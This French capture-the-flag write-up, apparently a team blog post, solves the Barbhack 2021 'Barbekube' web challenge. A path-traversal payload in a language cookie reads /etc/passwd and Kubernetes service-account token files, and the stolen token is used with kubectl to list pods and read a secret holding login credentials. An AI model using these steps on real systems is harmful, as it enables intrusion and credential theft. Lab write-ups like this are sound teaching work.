Barbhack 2021 — Web Write-up : Barbekube

Logo de la Barbhack

Introduction

Énoncé du challenge
Page d’accueil du site web hébergé sur http://barbekube.brb
  • une page de login
  • la possibilité de modifier la langue via un cookie
nmap barbekube.brb -sV -p 6443

LFI avec le cookie de sélection de langue

../../../../../etc/passwd
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate

Accès à l’API du cluster avec kubectl

apiVersion: v1
kind: Config
clusters:
- name: default-cluster
cluster:
certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM1ekNDQWMrZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeE1EZ3lPREl5TlRRek1sb1hEVE14TURneU5qSXlOVFF6TWxvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTGZUCkl3SXpacFJhTlI5S1hSQkJRY0NITFhTdCtPU1oyUWtXZXN4TnhXL1lyM1RRZ3k0RTZxY2lNY1A3ZW5qZjRWcWoKbzhabngvS0hBUTZXY25xZ21kTGFjdU5ZV3Avb3k3RUlvQUp5SlpwWExERytFSFFtVXRsVE9sU1FYZmt5UWpqNgpadnRSc211VDV2VlNkZ213eHU3TEppNW1tRzFkTHI4UFpJMU5nbTQzOFg2bmJxR0VIdS9OTEFuVEh4aGpPMnNnCmU0bm5GMXJOMUVWVGFWL2dZVFlpVDlIVCs1Y0Z6cnZZTXhTUmJQVURTWDZ0d3FlS0V6RzY5QTg2VFp1TlJ1ZmcKNFlRUHhISzdjT091S1pycUFHOWlMeVZjZHZsc3RHZjRCTVBIamM4N3VBMENoY0dteTRXV2w3T29naWg3c2JuRgpLVTE5UW5ObHVVWmhRUGEvUlNFQ0F3RUFBYU5DTUVBd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZOR0xSUEM1eDByU0ExL1kzRDRYZzBHUVRJUDFNQTBHQ1NxR1NJYjMKRFFFQkN3VUFBNElCQVFCNStlTzJEUW1iWFVsaXpSaDloY0F5cWowOG9iK2NsdmdBOVVRczJWbWhQdXRmZDR1UApiV2lOUTVKQXZUWHdYL0FrU0dwWlJxYmt0aFpsVmUrVjY3cHQ3TmdEaXFCR0FWa2VMMnF2TVdoaG4rVUNzZG85Cjd5MkppdFpCcjFvNC84NExVdjQwKy9aaDNWQ2ZFQnQwMG9HcUxrMGtlNFoyc1FRVHNUWGwyMnd3QXBiSE9LL0gKUS9mVnhib0Z3WjNyYTdwMUp5UndhVHl3YS9PVE44NEVXdFJVSzRSbnlKMW55c0FwR285Szg3SnN4KzVZckM2cQo0aUNqZUs0TVZocFlIWEZiRHloZUVWdmJEcEhDSERnUDFKYU9yc05lb2tFNVlLekJ0MUNpd3NKZ0Q1dUhHaXZzCmdHY0QwM0RXYW54NDVDK3dGZlI1MktBbGsrYlhnNTJ4enJjagotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0t
server: https://kubernetes.default.svc:6443
contexts:
- name: default-context
context:
cluster: default-cluster
namespace: the-barbekube
user: default-user
current-context: default-context
users:
- name: default-user
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6ImhHX3ZYNEdFaWFtX1BWRUpvYzljOUdsX09oS1UwekJlSTVNaVpCZEpoYWcifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjYxNzMzMzU3LCJpYXQiOjE2MzAxOTczNTcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJ0aGUtYmFyYmVrdWJlIiwicG9kIjp7Im5hbWUiOiJmcm9udGVuZC01ZDZmYzc0NDlkLTg2YmZuIiwidWlkIjoiMWY5ODUxOTktNGExMy00YzdhLTg2OGQtYjE5MTM4MWVjYjEwIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJ0aGUtYmFyYmVrdWJlLXNhIiwidWlkIjoiZmRlY2JmOTYtMzU3YS00ZWU1LTg4YmQtMmFjZmQzYjllNzFhIn0sIndhcm5hZnRlciI6MTYzMDIwMDk2NH0sIm5iZiI6MTYzMDE5NzM1Nywic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OnRoZS1iYXJiZWt1YmU6dGhlLWJhcmJla3ViZS1zYSJ9.RGmxp_KgZeoej0vtAuKLQCXpOeUoYvjzzclUi4ASGYh1-0zQovYs9hWKvVxfWHBuRVkwzilm-sZWB5GqDYgxFNQzkUCFDPw2tUSPon2tc8yUC5E1b-_H8trv6ejmOXh1_c2gEpgcopNe3sgDStvuHQZz5cWH9bUlWmIXaLcWspB6KwQxlb8iSIc_-X3oQfJABHnv5A3cuSpNHXJdMwiQ8GFeoQm12_xKkmR7QpbvX-K65JRIfNEsordIY2N4f6BHb_kxir8MYqo-CpWDiuHI8u067i7A6VwtO0IxuzBGZrBbr7B0Ht0oS-3h3qUnTavOKKCxVCzpy0zG2vuoOgNGmA
10.10.42.205 kubernetes.default.svc
kubectl --insecure-skip-tls-verify --kubeconfig ./config get pods 
NAME READY STATUS RESTARTS AGE
frontend-5d6fc7449d-86bfn 1/1 Running 0 102m
login-76cf467fdc-z7s7r 1/1 Running 0 102m
kubectl --insecure-skip-tls-verify --kubeconfig ./config auth can-i --listResources      Non-Resource URLs    Resource Names   Verbs...
pods.* [] [] [get list]
secrets.* [] [] [get]
...
kubectl --insecure-skip-tls-verify --kubeconfig ./config describe pods login-76cf467fdc-z7s7rName:         login-76cf467fdc-z7s7r
Namespace: the-barbekube
Priority: 0
Node: ctf-kube-challs-control-plane/172.18.0.2
Start Time: Sun, 29 Aug 2021 00:58:34 +0200
Labels: app=login
pod-template-hash=76cf467fdc
Annotations: <none>
Status: Running
IP: 10.244.0.10
IPs:
IP: 10.244.0.10
Controlled By: ReplicaSet/login-76cf467fdc
Containers:
login:
Container ID: containerd://b57c98d05fe8bbc729b64a7c298e436d2f52af6fd3a266523b3a4d2de4cb4dc0
Image: docker.io/barbekube/flag:v1
Image ID: sha256:963f6f7dd43e98a840d27309f979444c7595ceb0562ed3f51326a6d85e0d8567
Port: 8080/TCP
Host Port: 0/TCP
State: Running
Started: Sun, 29 Aug 2021 00:58:35 +0200
Ready: True
Restart Count: 0
Limits:
cpu: 200m
memory: 128Mi
Requests:
cpu: 200m
memory: 128Mi
Liveness: http-get http://:http/healthz delay=0s timeout=1s period=10s #success=1 #failure=3
Readiness: http-get http://:http/healthz delay=0s timeout=1s period=10s #success=1 #failure=3
Environment: <none>
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-6fqdj (ro)
Conditions:
Type Status
Initialized True
Ready True
ContainersReady True
PodScheduled True
Volumes:
kube-api-access-6fqdj:
Type: Projected (a volume that contains injected data from multiple sources)
TokenExpirationSeconds: 3607
ConfigMapName: kube-root-ca.crt
ConfigMapOptional: <nil>
DownwardAPI: true
QoS Class: Guaranteed
Node-Selectors: <none>
Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events: <none>
kubectl --insecure-skip-tls-verify --kubeconfig ./config describe pods frontend-5d6fc7449d-86bfnName:         frontend-5d6fc7449d-86bfn
Namespace: the-barbekube
Priority: 0
Node: ctf-kube-challs-control-plane/172.18.0.2
Start Time: Sun, 29 Aug 2021 00:58:34 +0200
Labels: app=frontend
pod-template-hash=5d6fc7449d
Annotations: <none>
Status: Running
IP: 10.244.0.11
IPs:
IP: 10.244.0.11
Controlled By: ReplicaSet/frontend-5d6fc7449d
Containers:
frontend:
Container ID: containerd://773f9598c71504be9c35690b20f67532d8ca3655b394ea7a0ca2c63fa4cd5443
Image: the-barbekube-frontend:latest
Image ID: sha256:7f534e0b54bfc1633bf948d871c219550c769dbb3fba083aded2560d5b39d4b3
Port: 80/TCP
Host Port: 0/TCP
State: Running
Started: Sun, 29 Aug 2021 00:58:36 +0200
Ready: True
Restart Count: 0
Limits:
cpu: 200m
memory: 128Mi
Requests:
cpu: 200m
memory: 128Mi
Liveness: http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
Readiness: http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
Environment: <none>
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-qnwcp (ro)
Conditions:
Type Status
Initialized True
Ready True
ContainersReady True
PodScheduled True
Volumes:
kube-api-access-qnwcp:
Type: Projected (a volume that contains injected data from multiple sources)
TokenExpirationSeconds: 3607
ConfigMapName: kube-root-ca.crt
ConfigMapOptional: <nil>
DownwardAPI: true
QoS Class: Guaranteed
Node-Selectors: <none>
Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events: <none>
Image:          the-barbekube-frontend:latest
Image:          docker.io/barbekube/flag:v1
docker pull docker.io/barbekube/flag:v1

Analyse de l’image docker publique

docker run -it --entrypoint /bin/sh docker.io/barbekube/flag:v1 /app # ls
Dockerfile __pycache__ kube.py main.py requirements.txt
/app # cat kube.py
from kubernetes import client, config
def getSecret():
# config.load_kube_config()
config.load_incluster_config()
v1 = client.CoreV1Api()
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()
secret = v1.read_namespaced_secret("login-credentials", current_namespace)

return secret
kubectl --insecure-skip-tls-verify --kubeconfig ./config get secrets login-credentials  -o yaml apiVersion: v1
data:
password: YnJie3AzNzE3My0zbjdyM2MwNzMtNHUtYjRyYjNrdWIzfQ==
username: YWRtaW4=
kind: Secret
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"v1","data":{"password":"YnJie3AzNzE3My0zbjdyM2MwNzMtNHUtYjRyYjNrdWIzfQ==","username":"YWRtaW4="},"kind":"Secret","metadata":{"annotations":{},"name":"login-credentials","namespace":"the-barbekube"},"type":"Opaque"}
creationTimestamp: "2021-08-28T22:58:34Z"
name: login-credentials
namespace: the-barbekube
resourceVersion: "1167"
uid: dadccd2e-bfa0-4c55-8ec4-243f75d67893
type: Opaque
{"password":"brb{p37173-3n7r3c073-4u-b4rb3kub3}","username":"admin"}
Flag de l’épreuve après connexion avec les informations du secret

--

--

French CTF team

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store